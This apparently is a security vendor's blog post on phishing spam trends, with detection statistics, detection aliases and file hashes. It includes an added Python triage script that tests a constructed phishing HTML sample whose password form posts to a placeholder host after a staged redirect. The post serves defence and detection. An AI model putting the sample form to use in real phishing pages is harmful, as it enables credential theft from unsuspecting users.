Trend of Phishing Spreading Through Spam Mails


AhnLab collects dozens of phishing spam mails from several clients daily. Phishing spam mails can be divided into two major types. The first type relies entirely on a fabricated e-mail (e.g. asking the recipient to reply with personal information). The second type includes the address of the phishing website in the body of the e-mail, prompting the user to connect to it, or includes the script file of the phishing website as an attachment. This post explains the characteristics of recent phishing attacks and the current state of damage from the second type of phishing, which must be blocked by security products.

When the user opens the phishing website address included in the body of the e-mail, or the attached HTML file, in a web browser, they are taken to a page that asks them to enter personal information such as a company account ID or password. In the past, such phishing pages gave users many reasons to be suspicious when compared with normal pages, such as poor screen content and layout. Today they are built to look almost identical to normal websites, so it is difficult for users to realize that their information has been leaked even after they enter it.

There have been numerous attempts at such attacks, especially against corporate users. This post therefore aims to minimize the damage from these attacks by describing the characteristics of the attack type in detail.

Current State of Damage

1) Current state of client-reported e-mails

Based on one day of reports from client XXX, AhnLab receives around 10 to 30 reports of malicious spam mails daily.

2) Malware detection

AhnLab applies detection patterns at various points in order to detect phishing malware. The number of cases detected in actual client environments by only the newly applied pattern during August 2021 is as follows: more than 5,400 cases of phishing malware were reported by around 1,000 clients.

Count: 5,420, PCID: 949

The pattern mentioned here is limited to a comprehensive detection method in which one pattern can diagnose multiple files (1:N), not a single file (1:1). This means that the count above is the minimum number of cases; if the cases detected with the previously applied patterns were included, the damage caused by phishing malware is assumed to be much greater.

Spam Mail

1) Example of spam mail

The following is one example of the spam mails collected from client XXX during August 2021. Users who often receive e-mails from outside the company are likely to connect to malicious websites without a second thought. There has also been a case of spam mail disguised as an e-mail related to company infrastructure. Such e-mails often include the company name in the subject, sender, and body to earn trust easily, so users must be vigilant.

Phishing Website

1) Example of phishing websites

The following is the screen users see when they connect to the phishing website address included in the spam mail or open the HTML file in a web browser. These pages commonly aim to steal account information for a well-known service or the user's company account. Many pages are built intricately, from the title to the background image, so that they can be mistaken for normal websites. Some recent phishing websites make the page redirection take some time, as if a verification process were running.
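The traits described above (a password prompt in an HTML attachment, and a redirect staged to look like verification) can be checked mechanically when triaging attachments. The following is an added example, not AhnLab's detection logic or code from the original post; the flag names, the sample attachment, and the example.test host are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment; example.test is a placeholder host.
SAMPLE = """<html><head><title>Sign in</title></head><body>
<form method="post" action="https://example.test/collect.php">
<input type="email" name="id" value="user@corp.example">
<input type="password" name="pw"><input type="submit" value="Sign in">
</form>
<script>setTimeout(function(){ location.href = "https://example.test/next"; }, 3000);</script>
</body></html>"""

class Triage(HTMLParser):
    """Collects form targets, password fields, meta refresh and script text."""
    def __init__(self):
        super().__init__()
        self.actions, self.script = [], ""
        self.password = self.refresh = self.in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password = True
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.refresh = True
        self.in_script = tag == "script"

    def handle_endtag(self, tag):
        self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.script += data

def triage(html_text):
    """Return the heuristic flags raised by one HTML attachment."""
    p = Triage()
    p.feed(html_text)
    flags = set()
    # A locally opened file that submits a password field to a remote URL.
    if p.password and any(urlparse(u).scheme in ("http", "https") for u in p.actions):
        flags.add("password-form-posts-to-remote-host")
    if p.refresh:
        flags.add("meta-refresh-redirect")
    # Redirect fired from a timer, matching the staged "verification" delay.
    if re.search(r"setTimeout[\s\S]*?location", p.script):
        flags.add("delayed-script-redirect")
    return flags
```

These are triage hints for routing an attachment to closer analysis, and a relative form action such as `/login` raises no flag.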

AhnLab’s Response

Phishing script files and the action of connecting to phishing websites are the targets for blocking. AhnLab's products use the aliases below. Only a few of the aliases are listed, as they are continually being updated.

Phishing/HTML.Generic.S1644 (2021.08.25.02)
Phishing/HTML.Generic.S1643 (2021.08.25.02)
Phishing/HTML.Generic.S1642 (2021.08.25.02)
Phishing/HTML.Generic.S1641 (2021.08.25.02)
Phishing/HTML.FakeExcel.S1632 (2021.08.23.02)
Phishing/HTML.FakeExcel.S1630 (2021.08.19.02)
Phishing/HTML.Redirect.S1621 (2021.08.13.02)
Phishing/HTML.Redirect.S1620 (2021.08.13.02)

MD5

04ef8dcac0699cc98ee2e3f63ec60d15
0d2dca7ee968e7f263b2edd0731c18af
10a2fd82ae872fa150256eb3079af6f2
1b09114f2475443c443d509f1f37a7e9
1b481f5e62271c12c5e64c2ddbbd7f34
